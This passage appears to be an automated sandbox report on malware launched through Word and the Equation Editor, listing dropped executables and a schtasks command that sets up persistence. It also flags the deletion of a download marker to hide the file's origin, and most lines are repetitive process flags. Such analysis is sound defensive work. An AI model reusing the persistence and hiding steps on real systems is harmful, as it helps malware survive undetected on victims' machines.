      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\plugmancdht5461.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeFile created: C:\Users\user\AppData\Roaming\ZdNnwVcb.exeJump to dropped file

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp

      Hooking and other Techniques for Hiding and Protection

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe:Zone.Identifier read attributes | delete
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drStream path '_1704543374/\x1Ole10Native' entropy: 7.99541578617 (max. 8.0)
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX

